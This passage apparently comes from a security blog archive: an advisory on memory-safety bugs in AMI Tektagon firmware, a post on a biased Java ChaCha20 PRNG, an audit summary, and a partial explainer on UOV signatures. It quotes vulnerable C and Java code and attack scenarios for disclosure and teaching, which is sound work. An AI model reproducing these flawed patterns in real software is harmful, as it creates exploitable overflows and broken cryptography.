The PFR attack surface is also expanded by the fact that it communicates with other devices via I2C or SMBus. The bus typically carries the MCTP and SPDM protocols. Without going into too much detail about these specifications, these protocols are used to:

  1. Establish a secure messaging channel between devices and IP blocks.
  2. Perform device firmware attestation.
  3. Detect and recover from TCB (Trusted Computing Base) failures.

Within the HRoT, these command handlers may accept variable length arguments, and so memory safety is again required when managing the message queues. 

So, with that in mind, I decided to jump into the recently open-sourced AMI Tektagon project and hunt for bugs. 

Vulnerability #1: I2C Command Handler 

This first vulnerability occurs in the PCH/BMC command handler. This is the same I2C communication interface that was mentioned above. Two of the command handlers violate memory safety.  

uint8_t gUfmFifoData[64]; 
uint8_t gReadFifoData[64]; 
... 
uint8_t gFifoData; 
... 
static unsigned int mailBox_index; 

uint8_t PchBmcCommands(unsigned char *CipherText, uint8_t ReadFlag) 
{ 
    byte DataToSend = 0; 
    uint8_t i = 0; 

    switch (CipherText[0]) { 
        ... 
        case UfmCmdTriggerValue: 
            if (ReadFlag == TRUE) { 
                DataToSend = get_provision_commandTrigger(); 
            } else { 
                if (CipherText[1] & EXECUTE_UFM_COMMAND) { 
                    ... 
                } else if (CipherText[1] & FLUSH_WRITE_FIFO) { 
                    memset( gUfmFifoData, 0, sizeof(gUfmFifoData)); 
                    gFifoData = 0; 
                } else if (CipherText[1] & FLUSH_READ_FIFO) { 
                    memset( gReadFifoData, 0, sizeof(gReadFifoData)); 
                    gFifoData = 0; 
                    mailBox_index = 0; 
                } 
            } 
            break; 

        case UfmWriteFIFO: 
            gUfmFifoData[gFifoData++] = CipherText[1]; 
            break; 

        case UfmReadFIFO: 
            DataToSend = gReadFifoData[mailBox_index]; 
            mailBox_index++; 
            break; 
        ...

Above, the UfmWriteFIFO command can eventually write data past the end of the gUfmFifoData[] array. This may occur if the attacker issues more than 64 commands in sequence without flushing the FIFO by sending a UfmCmdTriggerValue command. Because gFifoData is a uint8_t type, this enables an attacker to overwrite up to 192 bytes past the end of the FIFO buffer. 

Similarly, the UfmReadFIFO command can read data out-of-bounds by repeated invocations of the command between FIFO flushes. This OOB data appears to be eventually disclosed in the I2C response message in DataToSend. Because mailBox_index is an unsigned int type, this would enable an attacker to disclose a significant quantity of PFR SRAM, albeit relatively slowly due to only 1 byte being exposed at a time. 
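To see where the figure of 192 bytes comes from, the index arithmetic can be modeled in a few lines. This is a minimal Python sketch, not code from Tektagon: simulate_write_offsets is a hypothetical helper, and the only facts taken from the excerpt are the 64-byte buffer and the uint8_t index.

```python
FIFO_SIZE = 64        # matches `uint8_t gUfmFifoData[64]` in the excerpt
UINT8_MODULUS = 256   # a uint8_t index wraps around after 255

def simulate_write_offsets(num_commands):
    """Return the buffer offsets touched by repeated UfmWriteFIFO commands
    when no flush command is sent in between (hypothetical model)."""
    index = 0
    offsets = []
    for _ in range(num_commands):
        offsets.append(index)                # gUfmFifoData[gFifoData++] = ...
        index = (index + 1) % UINT8_MODULUS  # uint8_t post-increment wraps
    return offsets

offsets = simulate_write_offsets(300)
out_of_bounds = sorted({off for off in offsets if off >= FIFO_SIZE})
print(len(out_of_bounds), out_of_bounds[0], out_of_bounds[-1])  # 192 64 255
```

The same model applies to the read path, except that an unsigned int index does not wrap until far beyond the end of the buffer, which is why the read primitive reaches much further.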

I estimate that these command processing vulnerabilities can be triggered in three different scenarios: 

  1. A physical attacker that is tampering with the I2C bus traffic and injecting PCH/BMC commands to the Tektagon device. Physical attacks can often be discounted for cloud platforms where data centers are expected to be secured facilities, however thought should be given to whether a given deployment is vulnerable to supply chain attacks and hardware implants, as well as malicious or compelled insiders (especially in cases where servers are deployed in third party data centers where physical security is harder to monitor). 
  2. Given the prevalence of BMC vulnerabilities that have been discovered over the last several years, a more likely attack scenario is that a compromised BMC is aiming to pivot towards compromising the Tektagon device in order to undermine the platform’s PFR capabilities or to achieve persistence. 
  3. If the I2C bus happened to be a shared bus with multiple other peripherals of lesser privilege, then one could imagine a scenario where the host kernel (in the CPU) could access this bus and communicate directly with the PFR device, even if that was never the intention. 

Vulnerability #2: SPI Flash Parsing 

The next vulnerability occurs when the Tektagon firmware reads a public key from SPI flash. In the linked GitHub issue, I found and reported five instances where this same bug appears throughout the Tektagon source code, but for the sake of brevity, I will focus on just one simple example here. 

int get_rsa_public_key(uint8_t flash_id, uint32_t address, struct rsa_public_key *public_key) 
{ 
    int status = Success; 
    uint16_t key_length; 
    uint8_t  exponent_length; 
    uint32_t modules_address, exponent_address; 

    // Key Length 
    status = pfr_spi_read(flash_id, address, sizeof(key_length), &key_length); 
    if (status != Success){ 
        return Failure; 
    } 
 
    modules_address = address + sizeof(key_length); 
    // rsa_key_module 
    status = pfr_spi_read(flash_id, modules_address, key_length, public_key->modulus); 
    ... 

The code above performs two SPI flash reads. The first read operation obtains a size value (key_length) from a public key structure in flash, and the second read operation uses this key_length to obtain the RSA public key modulus.  

The bug arises due to lack of input validation. If the contents of external SPI flash were tampered with by an attacker, then key_length may be larger than expected. This length value is not validated before being passed as the size argument to the second pfr_spi_read() call, which can lead to out-of-bounds memory writes of public_key->modulus[].  

The modulus buffer is RSA_MAX_KEY_LENGTH (512) bytes in length, and in all locations where get_rsa_public_key() is called, the public_key structure is declared on the stack. Because the Zephyr build config used by Tektagon does not define CONFIG_STACK_CANARIES, such a stack-based memory corruption vulnerability would be highly exploitable. 
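The missing check is small. The following Python sketch models the two reads over a byte string standing in for flash and rejects any length that the 512-byte modulus buffer could not hold. It is an illustration under assumptions, not the vendor's fix: read_modulus is a hypothetical name, and the little-endian encoding of the length field is assumed.

```python
import struct

RSA_MAX_KEY_LENGTH = 512  # size of the modulus buffer, per the text above

def read_modulus(flash: bytes, address: int) -> bytes:
    """Hypothetical model of get_rsa_public_key() with a length check added."""
    # First read: the 16-bit length field (little-endian is an assumption).
    (key_length,) = struct.unpack_from("<H", flash, address)
    # The missing validation: refuse lengths the destination cannot hold.
    if key_length == 0 or key_length > RSA_MAX_KEY_LENGTH:
        raise ValueError(f"invalid key_length {key_length}")
    # Second read: the modulus itself, now bounded by the buffer size.
    start = address + 2
    modulus = flash[start:start + key_length]
    if len(modulus) != key_length:
        raise ValueError("flash image truncated")
    return modulus

good_image = struct.pack("<H", 256) + bytes(256)
bad_image = struct.pack("<H", 0xFFFF) + bytes(16)  # attacker-controlled length

print(len(read_modulus(good_image, 0)))
try:
    read_modulus(bad_image, 0)
except ValueError as err:
    print("rejected:", err)
```

In C, the equivalent is a single comparison of key_length against RSA_MAX_KEY_LENGTH between the two pfr_spi_read() calls.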

Conclusion

These two vulnerabilities were extremely shallow, and I discovered them both in the same afternoon after first pulling the source code from GitHub. I am fairly certain that other vulnerabilities exist in this code.  

(As an aside, you might also be interested to know that Tektagon is based on the Zephyr RTOS, for which we published a research report a few years back, highlighting numerous vulnerabilities in both its implementation and design.) 

These bugs are great illustrations of how a “security feature” is not always a “secure feature”. Although PFR aims to improve platform security, it does so at the cost of introducing new attack surfaces. Bugs in these attack surfaces can be abused to achieve privilege escalation by the very same adversaries and threats that PFR is designed to defend against – that is, threats involving maliciously tampered SPI flash contents, and adversaries who have compromised a peripheral device and are seeking to pivot laterally to attack another device firmware. 

Think carefully about the threat model of your products, and how adding new features and attack surfaces might affect your overall security posture. As always, we recommend you perform a full assessment of any third-party firmware components before they make it into your product. This is just as true for open source as it is for proprietary code bases, and in particular, new and untested components and technologies. 

As of April 6th 2023, these vulnerabilities were fixed in commit d6d935e. No CVEs were issued by AMI. 

Disclosure Timeline 

  • Oct 25, 2022 – Initial disclosure on GitHub. 
  • Nov 3, 2022 – Response from vendor indicating that fixes are in progress. 
  • Jan 6, 2023 – NCC Group requests an update. 
  • Jan 13, 2023 – Vendor communicated a plan to release fixes by end of January. 
  • Feb 10, 2023 – NCC Group requests an update. 
  • Feb 13, 2023 – Vendor revised plan to release fixes by end of February or early March. 
  • Mar 31, 2023 – NCC Group requests another update.
  • Apr 4, 2023 – Vendor indicates the next release is planned on or before the 2nd week of April.
  • Apr 6, 2023 – Commit d6d935e reorganizes the repo. It fixes vulnerability #1 but only partially fixes vulnerability #2.
  • May 2, 2023 – NCC Group reviewed above commit and provided detailed analysis of the unfixed issues.
  • May 5, 2023 – Vendor communicated that the remaining fixes will land by May 12th.
  • May 31, 2023 – NCC Group queried the status of the fixes.
  • July 25, 2023 – Vendor indicated that remaining unfixed functions are dead/unused code.
  • Aug 18, 2023 – NCC Group reviewed the code to confirm that the functions are unused.
  • Aug 23, 2023 – Publication of this advisory.

Dancing Offbit: The Story of a Single Character Typo that Broke a ChaCha-Based PRNG

Random number generators are the backbone of most cryptographic protocols, the crucial cornerstone upon which the security of all systems relies, yet they often remain overlooked. This blog post presents a real-world vulnerability discovered in the implementation of a Pseudo-Random Number Generator (PRNG) based on the ChaCha20 cipher.

Discovery of a biased PRNG

During a recent engagement, we were tasked with reviewing a ChaCha20-based PRNG, following a design similar to the Rust ChaCha20Rng. The implementation under review was written in Java and a first pass over the source implementation did not reveal any glaring issue.

Similarly, a glance over the output produced by the PRNG seemed normal at first. As an example, the PRNG produced the following 32-byte sequence when seeded with a random seed:

-69, -112, 94, -33, 51, 35, -123, 21, -20, -30, -93, -51, -128, -78, -62, 37, -108, 5, 72, 15, 15, -121, 90, 41, -96, -107, -94, -50, 39, -96, -116, 19

Note that since Java does not support unsigned primitive types, bytes are interpreted in two’s complement representation and a byte can take any value from -128 to 127.

However, when generating longer outputs, some curious patterns started to emerge. Consider the following 128-byte output, seeded with the same random value as before:

-69, -112, 94, -33, 51, 35, -123, 21, -20, -30, -93, -51, -128, -78, -62, 37, -108, 5, 72, 15, 15, -121, 90, 41, -96, -107, -94, -50, 39, -96, -116, 19, 48, 41, 127, -90, -62, -31, -103, -59, -51, 82, 49, 72, 103, -112, 76, -67, 29, -88, 126, -101, -85, -1, -1, -1, 10, 81, 8, -76, -126, -1, -1, -1, -62, -21, 79, 104, -120, 55, -125, -70, 2, 108, -95, 74, -44, 89, -124, -20, 30, 76, -126, 90, 69, -1, -1, -1, 39, -110, -48, -34, 83, -1, -1, -1, 16, 41, 2, 115, -100, 96, 28, -65, -44, -73, 102, -123, 45, -11, -117, -128, 7, -55, -10, -50, -38, -1, -1, -1, 81, 127, -69, -22, 124, 82, 51, 112

Starting at byte 54, sequences of triplets of -1 are repeated multiple times, too often for this pattern to be random. Note that -1 is equivalent to the byte value 0xFF (that is, the byte exclusively composed of 1-bits: 0b1111 1111), but Java interprets and displays that value as -1.

Identifying the root cause

Driven by the feeling that something was amiss, we delved into the code once more and eventually narrowed down the faulty code to the rotateLeft32() function, a critical building block of ChaCha20. This function is excerpted below for convenience.

private static int rotateLeft32(int x, int k) {
    final int n = 32;

    int s = k & (n - 1);
    return x << s | x >> (n - s);
}

At a first glance, this function seems to perform a fairly standard left rotation on 32-bit values. Since Java does not have a primitive type for unsigned integers, this function operates on signed integers. Upon more careful inspection, we discovered something wrong with the right shift operation performed in the return statement of the function. The >> operator used in the function above performs a signed right shift in Java (also known as an arithmetic right shift, or a sign-propagating right shift since it preserves the sign of the resulting number).

When shifting an integer by one with the >> operator, the most significant bit (i.e., the leftmost bit) is not unconditionally replaced by a zero, but by a copy of the sign bit of the shifted value (0 for a non-negative integer, 1 for a negative integer). Since the return value of the rotateLeft32() function is computed using a bitwise “or” with that shifted quantity, the superfluous 1-bits resulting from shifting a negative input value will be propagated to the output. Hence, the rotateLeft32() function may produce incorrect results when performing the bitwise rotation of negative 32-bit integers.

In contrast, the operator >>> performs an unsigned right shift (or logical right shift) in Java, where the extra bits shifted off to the right are discarded and replaced with zero bits regardless of the sign of the original value. It is this operator that should have been used in the rotateLeft32() function. This subtle difference is very specific to Java. In Rust for example, the type of the value shifted dictates which shift variant to use, as explained in The Rust Reference book, in the section on Arithmetic and Logical Binary Operators:

Arithmetic right shift on signed integer types, logical right shift on unsigned integer types.

Impact

The impact of this issue in the rotation function could already be observed visually by the repeated presence of -1s. In order to understand why using a signed right shift results in an increased probability of generating -1 bytes, let us look at the ChaCha function using that left rotation operation, namely the Quarter Round function, see RFC 7539:

a += b; d ^= a; d <<<= 16;
c += d; b ^= c; b <<<= 12;
a += b; d ^= a; d <<<= 8;
c += d; b ^= c; b <<<= 7;

For each call to the ChaCha Quarter Round function, internal state variables are left-rotated (using the rotateLeft32() function) by some fixed values, as highlighted above. Consider what happens when left-rotating a value with a single 1-bit using the function above. For illustration purposes, we’ll use the value 0x80000000 which corresponds to the quantity 10000000 00000000 00000000 00000000 (split into 8-bit chunks for clarity, and where obvious repeated sequences of 0s are replaced with ...).

 rotateLeft32(1000 ... 0000, 16)
 = 1000 ... 0000 << 16 | 1000 ... 0000 >> 16
 = 00 ... 0 | 1100 ... 0000 >> 15
 = 1110 ... 0000 >> 14
 = ...
 = 11111111 11111111 10000000 00000000
 = 0xFFFF8000
 = {-1, -1, -128, 0}

In this case, a value containing a single 1-bit as input results in an output consisting of seventeen (17) 1s! This helps explain why the output that originally caught our eye contained so many -1 bytes.
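The computation above can be reproduced outside of Java. The sketch below is a Python emulation written for this purpose, not the reviewed code: Python's >> on a negative integer is an arithmetic shift, so converting the input to a signed 32-bit value mimics Java's >>, while masking to 32 bits first mimics >>>. The names to_signed32, rotl32_buggy and rotl32_fixed are hypothetical.

```python
MASK32 = 0xFFFFFFFF

def to_signed32(x):
    """Interpret the low 32 bits of x as a Java int (two's complement)."""
    x &= MASK32
    return x - (1 << 32) if x & 0x80000000 else x

def rotl32_buggy(x, k):
    """Mirrors the excerpt: x << s | x >> (n - s), with a signed right shift."""
    s = k & 31
    x = to_signed32(x)
    # Java only uses the low 5 bits of an int shift count, hence the "& 31".
    return ((x << s) | (x >> ((32 - s) & 31))) & MASK32

def rotl32_fixed(x, k):
    """Same rotation with a logical right shift, like Java's >>>."""
    s = k & 31
    x &= MASK32
    return ((x << s) | (x >> ((32 - s) & 31))) & MASK32

def java_bytes(word):
    """Big-endian bytes of a 32-bit word, displayed as Java signed bytes."""
    return [b - 256 if b > 127 else b for b in word.to_bytes(4, "big")]

buggy = rotl32_buggy(0x80000000, 16)
fixed = rotl32_fixed(0x80000000, 16)
print(hex(buggy), java_bytes(buggy))  # 0xffff8000 [-1, -1, -128, 0]
print(hex(fixed), java_bytes(fixed))  # 0x8000 [0, 0, -128, 0]
```

For inputs whose top bit is clear, both variants agree, which is one reason a bug of this kind can survive casual testing.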

Using the incorrect shift operation introduces a damaging bias in the output distribution. To illustrate this bias, the figure below shows a plot of the output distribution of the ChaChaPRNG implementation when seeded with the same seed as in the examples, and used to generate a total of 10,000 32-byte samples. In the figure below, the bytes are normalized to be in the [0, 255] range. The most striking outlier is the value 255 (the -1 discussed previously), which appears with probability over 20%. But other values also have significant biases, such as 0 (which appears with probability 2.46%) or 81 (which appears with probability 2.50%). In a uniformly random distribution, a given byte should appear with probability 1/256 ≈ 0.39%.

Research has shown that leaking as little as one bit of an ECDSA nonce could lead to full key recovery. Thus, using the output of this PRNG for cryptographic applications could completely break the security of the systems that rely upon it.

The fix

In this instance, the fix was pretty simple. Replacing the right-shift operator in the rotateLeft32() function by an unsigned right shift ( >>> ) did the trick:

return (x << s) | (x >>> (n - s));

The figure below shows the “corrected” output distribution after modifications of the rotateLeft32(), with the same number of samples and the same seed as for the first figure. The vertical axis is cut off at the 3% mark to better show the distribution without the visualization being skewed by the higher-percentage 255 output. The corrected output distribution looks much more uniform.

Conclusion

When writing security-critical code, low level details such as bit operations on underlying number representation can have colossal consequences. In this post, we described a real-world case of a single missing “greater-than” character that totally broke the security of the PRNG built on top of the buggy function. This highlights the challenges of porting implementations between languages supporting different primitive types and arithmetic operations.

I’d like to thank Giacomo Pope and Gérald Doussot for their feedback on this post and for their careful review. Any remaining errors are mine alone.

Public Report – Penumbra Labs R1CS Implementation Review

In July 2023 Penumbra Labs engaged NCC Group’s Cryptography Services team to perform an implementation review of their Rank-1 Constraint System (R1CS) code and the associated zero-knowledge proofs within the Penumbra system. These proofs are built upon decaf377 and poseidon377, which have been previously audited by NCC Group, with a corresponding public report. The review was performed remotely with three consultants contributing 20 person-days over a period of two weeks, along with one additional consultant shadowing.

The review was scoped to R1CS-related functionality within the Penumbra codebase, including fixed-point arithmetic and proofs for Spend, Output, Swap, Swap Claim, Delegator Vote, and Undelegate Claim, alongside modifications made to Zcash Sapling relating to key hierarchy, asset-specific generators, note format, tiered commitment tree, nullifier derivation, balance commitment, and usage of payload keys. R1CS gadgets in decaf377 and poseidon377 were also reviewed.

Demystifying Multivariate Cryptography

As the name suggests, multivariate cryptography refers to a class of public-key cryptographic schemes that use multivariate polynomials over a finite field. Solving systems of multivariate polynomials is known to be NP-complete, thus multivariate constructions are top contenders for post-quantum cryptography standards. In fact, 11 out of the 50 submissions for NIST’s call for additional post-quantum signatures are multivariate-based. Multivariate cryptography schemes have received new interest in recent years due to the push to standardize post-quantum primitives.

Sadly, the resources available online to learn about multivariate cryptography seem to fall into one of two categories: high-level overviews or academic papers. The former is fine for getting a feel for the topic, but does not give enough details to feel fully satisfied. On the other hand, the latter is chock full of details, and is rather dense and complex. This blog post aims to bridge the gap between the two types of resources by walking through an illustrative example of a multivariate digital signature scheme called Unbalanced Oil and Vinegar (UOV) signatures. UOV schemes serve as the basis for a number of contemporary multivariate signature schemes like Rainbow and MAYO.

This post assumes some knowledge of cryptography (namely what a digital signature scheme is), the ability to read some Python code, and a bit of linear algebra knowledge. By the end of the post the reader should not only have a strong conceptual grasp of multivariate cryptography, but also understand how a (toy) implementation of UOV works.

Preliminaries

A multivariate quadratic (which is the degree of polynomial we concern ourselves with in multivariate cryptographic schemes) is a quadratic equation with two or more indeterminates (variables). For instance, a multivariate quadratic equation (MQ) with three indeterminates can be written as: p(x,y,z)=ax^2 + by^2 + cz^2 + dxy + exz + fyz + gx + hy + iz + j where at least one of the second-degree coefficients a,b,c,d,e,f is not equal to 0. With an MQ defined, we can now describe the hard problem on which the security of MQ cryptography schemes is based: the so-called MQ problem.

MQ Problem
Given a finite field of q elements \mathbb{F}_{q} and m quadratic polynomials p_1,\ldots,p_m \in \mathbb{F}_q[X_1,\ldots,X_n] in n variables for m<n, find a solution (x_1,\ldots,x_n) \in \mathbb{F}^{n}_{q} of the system of equations. That is, for i=1,\ldots,m we have p_i(x_1,\ldots,x_n) = 0.

The MQ problem is known to be NP-complete, and it is thought that quantum computers will not be able to solve this problem more efficiently than classical computers. However, in order to be able to design secure cryptographic schemes based on the MQ problem, we need to find a trapdoor that allows a party with some private information to efficiently solve the problem. This is like knowing the factorization of the modulus N in RSA or the discrete-log in Diffie-Hellman key exchange.

Generally, in multivariate public key signature schemes we define the public verification key \mathsf{pub} as an ordered collection of m multivariate quadratic polynomials in n variables over a finite field \mathbb{F}_q for n > m. That is, \mathsf{pub} = p_1,\ldots,p_m \in \mathbb{F}_q [X_1,\ldots,X_n]. The verification function is then a polynomial map V_{\mathsf{pub}}: \mathbb{F}^{n}_{q} \rightarrow \mathbb{F}^{m}_q such that: V_{\mathsf{pub}}(X_1,\ldots,X_n) = (p_1(X_1,\ldots,X_n),\ldots,p_m(X_1,\ldots,X_n)).

Note that our signatures will be of length n and messages (or likely in practice a hash of the message we are signing) will be encoded as m field elements in \mathbb{F}_q. One simply verifies signatures by ensuring that V_{\mathsf{pub}}(\mathrm{signature}) =\mathrm{message} for the message corresponding to the signature. The secret key (signing key) \mathsf{priv} is then some data on how \mathsf{pub} is generated that makes it easy to invert V_{\mathsf{pub}} and generate a valid signature for a given message. Generating a valid signature for a given message without knowledge of the secret key is exactly an instance of the MQ problem, and thus should be hard for even a quantum-capable adversary.

However, we need special structure in \mathsf{pub} to ensure that a trapdoor exists so that parties with knowledge of \mathsf{priv} can easily sign messages. This reduces the problem space, and thus may lead to vulnerabilities in multivariate cryptography schemes. One such design that seems to have remained secure despite years of thorough cryptanalysis is Unbalanced Oil and Vinegar signatures. We will describe the scheme in the next section and present a toy implementation and a walkthrough to see how the inner mechanisms of the scheme work.

Unbalanced Oil and Vinegar Signatures

Unbalanced Oil and Vinegar (UOV) multivariate signatures were first introduced by Kipnis, Patarin, and Goubin in 1999. One can find the original paper here. UOV is based on an earlier scheme, Oil and Vinegar signatures, introduced by Patarin in 1997. The earlier scheme was broken by a structural attack discovered by Kipnis and Shamir in 1998. However, with a slight variation of the original scheme the UOV signature scheme was created and is thought to be secure. We will now go through the parts of the signature algorithm.

UOV Parameters

We choose a small finite field \mathbb{F}_{q}, where we usually select q=2^{k} for some small power k. The n input variables (X_1,\ldots,X_n) are divided into two ordered collections, the so-called oil and vinegar variables: X_1,\ldots,X_o = O_1,\ldots,O_o and X_{o+1},\ldots,X_{o+v} = V_1,\ldots,V_v, respectively, with n=o+v. The message to be signed (or, more likely, the hash of said message) is represented as an element in \mathbb{F}^{o}_{q} and is denoted m=(m_1,\ldots,m_o). The signature is then represented as an element of \mathbb{F}^{o+v}_{q} and is denoted s=(s_1,\ldots,s_{o+v}).

Private (Signing) Key

Our secret key is a pair (L,\mathcal{F}). We take L to be a bijective and affine function such that L : \mathbb{F}^{o+v}_{q} \rightarrow \mathbb{F}^{o+v}_{q}. For our purposes we can take the meaning of affine to be that the outputs of the function can be expressed as polynomials of degree one in the n=o+v indeterminates and that our coefficients on such inputs are in the field \mathbb{F}_q. Then, \mathcal{F} (also referred to as the central map) is an ordered collection of o functions that can be expressed in the form: f_k(X_1,\ldots,X_n) = \sum_{i,j} a_{i,j,k} O_i V_j + \sum_{i,j} b_{i,j,k} V_i V_j + \sum_{i} c_{i,k} O_i + \sum_{i} d_{i,k} V_i + e_k where k \in [1 \ldots o]. The coefficients a_{i,j,k}, b_{i,j,k}, c_{i,k}, d_{i,k}, e_{k} \in \mathbb{F}_{q} are selected randomly and are kept secret. Note that vinegar variables “mix” quadratically with all other variables, but oil variables never “mix” with themselves. That is, there are no O_i O_j terms, hence the name of the scheme (although one might observe that this is not how salad dressing actually works).
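The practical consequence of having no O_i O_j terms is that, once the vinegar values are fixed, each f_k is affine in the oil variables. The following pure-Python sketch checks this numerically for one randomly generated polynomial of the form above. It is an illustration under assumptions: the field is taken to be GF(2^8) with reduction polynomial x^8 + x^4 + x^3 + x^2 + 1, and the helper names (gf_mul, random_central_poly, evaluate) are hypothetical.

```python
import random

def gf_mul(a, b, poly=0x11D):
    """Multiply in GF(2^8); the reduction polynomial is an assumed choice."""
    result = 0
    while b:
        if b & 1:
            result ^= a
        a <<= 1
        if a & 0x100:
            a ^= poly
        b >>= 1
    return result

def random_central_poly(o, v, rng):
    """Random coefficients a (oil*vinegar), b (vinegar*vinegar), c, d, e."""
    return {
        "a": [[rng.randrange(256) for _ in range(v)] for _ in range(o)],
        "b": [[rng.randrange(256) if j >= i else 0 for j in range(v)]
              for i in range(v)],
        "c": [rng.randrange(256) for _ in range(o)],
        "d": [rng.randrange(256) for _ in range(v)],
        "e": rng.randrange(256),
    }

def evaluate(poly, oil, vin):
    """Evaluate f_k(oil, vin); addition in GF(2^8) is XOR."""
    acc = poly["e"]
    for i, o_i in enumerate(oil):
        acc ^= gf_mul(poly["c"][i], o_i)
        for j, v_j in enumerate(vin):
            acc ^= gf_mul(poly["a"][i][j], gf_mul(o_i, v_j))
    for i, v_i in enumerate(vin):
        acc ^= gf_mul(poly["d"][i], v_i)
        for j, v_j in enumerate(vin):
            acc ^= gf_mul(poly["b"][i][j], gf_mul(v_i, v_j))
    return acc

rng = random.Random(1)
o, v = 3, 6
f = random_central_poly(o, v, rng)
vin = [rng.randrange(256) for _ in range(v)]
x = [rng.randrange(256) for _ in range(o)]
y = [rng.randrange(256) for _ in range(o)]
x_plus_y = [a ^ b for a, b in zip(x, y)]
zero = [0] * o

# For an affine map g in characteristic 2: g(x+y) + g(x) + g(y) + g(0) = 0.
check = (evaluate(f, x_plus_y, vin) ^ evaluate(f, x, vin)
         ^ evaluate(f, y, vin) ^ evaluate(f, zero, vin))
print(check)  # 0
```

The same check fails for the vinegar variables in general, because of the V_i V_j terms.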

Public (Verification) Key

Let X be an element of \mathbb{F}^{o+v}_{q} defined in the style of our input (x_1,\ldots,x_{o+v}). We then transform X into Z = L(X) = (z_1,\ldots,z_n), where L is our secret function. Each function f_k, k \in [1 \ldots o], can be written as a polynomial P_k of total degree two in the z_j unknowns, j \in [1 \ldots n] where n=o+v. We denote our public key, \mathcal{P}, as the ordered collection of these o polynomials in n=o+v unknowns: \forall k \in [1 \ldots o] \tilde{f}_{k} = P_{k}((z_1,\ldots,z_n)). That is to say, we compose \mathcal{F} with L: \mathcal{P} = \mathcal{F} \circ L. We will elucidate how this computation is actually done in our illustrative example.

Signing

We solve for a signature s=(s_1,\ldots,s_n) \in \mathbb{F}^{n}_{q} (where n=o+v) of the message (or hash of the message) m=(m_1,\ldots,m_o) \in \mathbb{F}^{o}_{q} in the following way:

  1. Select random vinegar values v_{r,1},\ldots,v_{r,v} and substitute them into each of the o equations in \mathcal{F}.
  2. We are then left to find the o unknowns o^{*}_1,\ldots,o^{*}_o that satisfy \mathcal{F}(o^{*}_1,\ldots,o^{*}_o,v_{r,1},\ldots,v_{r,v}) = (m_1,\ldots,m_o). This is a linear system of equations in the oil variables, as we have no O_i O_j terms in our private key. This can be solved using Gaussian elimination.
  3. If the system is indeterminate, return to step 1.
  4. Compute the signature of m=(m_1,\ldots,m_o) as s = (s_1,\ldots,s_n) = L^{-1}(o^{*}_1,\ldots,o^{*}_o,v_{r,1},\ldots,v_{r,v}).

In brief, we invert \mathcal{P} (solve the MQ problem) by using the secret structure of \mathcal{P}, i.e. the fact that it is the composition of two maps, \mathcal{F} and L, each of which is easy to invert if you know it.

Verification

The recipient simply checks that \mathcal{P}(s_1,\ldots,s_n) = (m_1,\ldots,m_o).

Correctness

Recall that our verification key is \mathcal{P} = \mathcal{F} \circ L, and the signing key is (\mathcal{F},L). Our signature is of the form s= L^{-1} \circ \mathcal{F}^{-1}(m). Then we can show \mathcal{F} \circ L(L^{-1} \circ \mathcal{F}^{-1}(m)) =\mathcal{F} \circ \mathcal{F}^{-1}(m) =m as desired.
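The round trip can also be checked numerically. The sketch below is a self-contained pure-Python toy and not the implementation discussed in this post. It assumes, for brevity, a central map with quadratic terms only (no linear or constant terms), a linear L given by an invertible matrix, and the field GF(2^8) with reduction polynomial x^8 + x^4 + x^3 + x^2 + 1. All function names are hypothetical.

```python
import random
from functools import reduce
from operator import xor

def gf_mul(a, b, poly=0x11D):
    """Multiply in GF(2^8); the reduction polynomial is an assumed choice."""
    result = 0
    while b:
        if b & 1:
            result ^= a
        a <<= 1
        if a & 0x100:
            a ^= poly
        b >>= 1
    return result

def gf_inv(a):
    """Inverse of a nonzero element, computed as a^254."""
    return reduce(gf_mul, [a] * 254, 1)

def dot(u, v):
    return reduce(xor, (gf_mul(x, y) for x, y in zip(u, v)), 0)

def mat_mul(A, B):
    cols = list(zip(*B))
    return [[dot(row, col) for col in cols] for row in A]

def quad_form(M, x):
    """Evaluate x^T M x."""
    return dot(x, [dot(row, x) for row in M])

def solve(A, b):
    """Solve the square system A x = b; return None if A is singular."""
    n = len(A)
    rows = [list(A[i]) + [b[i]] for i in range(n)]  # augmented matrix
    for col in range(n):
        pivot = next((r for r in range(col, n) if rows[r][col]), None)
        if pivot is None:
            return None
        rows[col], rows[pivot] = rows[pivot], rows[col]
        inv = gf_inv(rows[col][col])
        rows[col] = [gf_mul(inv, e) for e in rows[col]]
        for r in range(n):
            if r != col and rows[r][col]:
                f = rows[r][col]
                rows[r] = [e ^ gf_mul(f, p) for e, p in zip(rows[r], rows[col])]
    return [row[n] for row in rows]

def keygen(o, v, rng):
    n = o + v
    # Central map: upper-triangular matrices with a zero oil x oil block.
    F = [[[rng.randrange(256) if j >= max(i, o) else 0 for j in range(n)]
          for i in range(n)] for _ in range(o)]
    while True:
        L = [[rng.randrange(256) for _ in range(n)] for _ in range(n)]
        if solve(L, [0] * n) is not None:  # keep only an invertible L
            break
    Lt = [list(col) for col in zip(*L)]
    P = [mat_mul(mat_mul(Lt, Fk), L) for Fk in F]  # P_k = L^T F_k L
    return (F, L), P

def sign(priv, msg, o, v, rng):
    F, L = priv
    while True:
        vin = [rng.randrange(256) for _ in range(v)]  # step 1
        # With vinegar fixed, f_k(oil, vin) = A[k] . oil + f_k(0, vin).
        A = [[dot([Fk[i][j] ^ Fk[j][i] for j in range(o, o + v)], vin)
              for i in range(o)] for Fk in F]
        rhs = [m ^ quad_form(Fk, [0] * o + vin) for m, Fk in zip(msg, F)]
        oil = solve(A, rhs)  # step 2
        if oil is not None:  # step 3: otherwise draw new vinegar values
            return solve(L, oil + vin)  # step 4: s = L^{-1}(oil, vin)

def verify(P, sig, msg):
    return [quad_form(Pk, sig) for Pk in P] == msg

rng = random.Random(2023)
priv, pub = keygen(3, 6, rng)
msg = [0x12, 0x34, 0x56]
sig = sign(priv, msg, 3, 6, rng)
print(verify(pub, sig, msg))  # True
```

Note that the verifier only ever touches the public matrices P_k, while the signer never solves a quadratic system: it solves one o x o linear system for the oil values and one n x n linear system to apply L^{-1}.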

Security Considerations

As mentioned above, the original Oil and Vinegar scheme is broken. That is, the case where v = o (or when they are quite close) is broken by the structural attack of Kipnis and Shamir. For v \geq o^{2} the scheme is not secure because of efficient algorithms to solve heavily under-determined quadratic systems. The current recommendation, for which no technique is known to reduce the difficulty of solving the MQ problem, is to set v = 2o or v =3o. Therefore, the scheme we examine is called Unbalanced due to the fact that v \neq o.

Advantages and Problems of UOV

